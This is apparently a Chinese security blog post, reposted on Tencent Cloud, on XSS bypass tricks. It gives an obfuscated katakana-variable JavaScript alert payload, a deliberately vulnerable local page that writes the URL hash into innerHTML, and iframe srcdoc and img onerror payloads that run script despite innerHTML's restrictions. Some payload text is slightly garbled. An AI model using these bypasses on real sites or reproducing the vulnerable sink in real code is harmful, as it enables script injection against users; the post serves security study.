小生归一(六)xss特殊绕过
此文章为原创连载文章,关注公众号,持续更新。
原python与安全系列作者文续
1.特殊alert
([,ウ,,,,ア]=[]+{},[ネ,ホ,ヌ,セ,,ミ,ハ,ヘ,,,
ナ]=[!!ウ]+!ウ+ウ.ウ)[ア+=ウ+ナ+ヘ+ネ+ホ+ヌ+
ア+ネ+ウ+ホ][ア](ミ+ハ+セ+ホ+ネ+'(-~ウ)')()
学习来源:
(https://github.com/aemkei/katakana.js/blob/master/annotated.js)
此处本来应有表情包~(懒得放了)
2.绕过innerHTML插入无法执行
在HTML5中不会执行由innerHTML插入的script标签
1、通过iframe的srcdoc
本地搭建如下:
<html>
<body>
<h1>TESTONE</h1>
</body>
<script>
var test=document.location.hash.substr(1);
document.body.innerHTML=unescape(test);
</script>
</html>下面访问不能执行alert:
alert(1);" _href="http://localhost/#alert(1);">http://localhost/#<script>alert(1);</script>下面访问可以执行alert:
http://localhost/#<iframesrcdoc="<script>alert(1);</script>"></iframe>2、使用其他标签代替script
继续使用前面的环境测试:
http://localhost/#"<imgsrc='x' onerror='alert(1)'>"除了script标签意外其它差不多都可以。
本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2020-04-30,如有侵权请联系 cloudcommunity@tencent.com 删除
评论
登录后参与评论
推荐阅读
腾讯云开发者
